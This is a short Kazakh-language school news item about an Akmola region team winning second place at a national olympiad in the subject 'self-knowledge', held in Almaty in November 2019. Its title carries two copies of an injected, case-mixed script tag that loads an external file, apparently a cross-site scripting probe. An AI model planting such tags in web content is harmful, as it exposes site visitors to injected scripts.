Итоги республиканской олимпиады по самопознанию<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

14.11.2019

2019 жылғы 12-14 қараша аралығында балалар мен жасөсіпірімдердің шығармашылық әлеуетін дамыту, өз мүмкіндіктерін шығармашылық іс-әрекетте көрсетуге ынталандыру, тұлғалық қасиеттері мен азаматтық ұстанымдарын көрсету, өзін-өзі кемелдендіру мақсатында Алматы қаласы, «Бөбек» ұлттық ғылыми-практикалық білім беру және сауықтыру орталығында  өзін-өзі тану  пәні бойынша республикалық олимпиада өткізілді.

Олимпиадаға Қазақстан Республикасының әр өңірінен 3 оқушыдан қатысты. Аталмыш олимпиадаға  Ақмола облысынан 3 оқушы қатысты. Олар Степногорск қаласы, облыстық дарынды балаларға арналған №4 «Болашақ» мамандандырылған мектеп-интернатының 8, 9 сынып оқушылары Сембиев Даут, Әбдірахим Көркем, Турсынмуратова Аида.

Олимпиада қорытындысы бойынша Ақмола облысының командасы 2 орын иегері атанды. Жүлдегерлерімізді шын жүректен құттықтай отыра, алдағы уақытта талай биік белестерді бағындыруына тілектеспіз!

Просмотров: 460


Пікір қосу



Деректерді қолтаңбаға қосу